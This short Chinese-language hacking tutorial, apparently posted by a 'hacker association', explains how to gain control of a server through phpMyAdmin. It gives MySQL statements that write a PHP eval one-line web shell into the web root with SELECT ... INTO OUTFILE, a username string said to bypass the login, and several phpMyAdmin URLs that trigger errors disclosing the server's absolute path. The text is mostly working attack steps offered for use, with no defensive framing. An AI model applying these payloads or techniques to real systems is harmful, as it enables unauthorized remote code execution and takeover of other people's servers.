文档介绍:phpmyadmin写一句话木马拿***思路(骇客协会)
先介绍
MySQL导出一句话木马的语法(我个人比较喜欢说思路)
Drop TABLE IF EXISTS temp; //如果存在temp就删掉 Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段 Insert INTO temp (cmd) VALUES('<? php eval_r($_POST[cmd]);?>'); //把一句话木马插入到temp表 Select cmd from temp into outfile 'F:/wwwroot/'; // Drop TABLE IF EXISTS temp; //删除temp 简化 Select '<? php eval_r($_POST[cmd]);?>' into outfile 'F:/wwwroot/';(以上的意思大概看看就可以下面来碰运气)利用方法:用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)附上几个php爆绝对路径的办法:
phpMyAdmin/libraries/
phpMyAdmin/darkblue_orange/
phpMyAdmin/?lang[]=1
phpmyadmin/themes/darkblue_orange/
使用phpmyadmin的某个文件报错
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/
phpMyAdmin/libraries/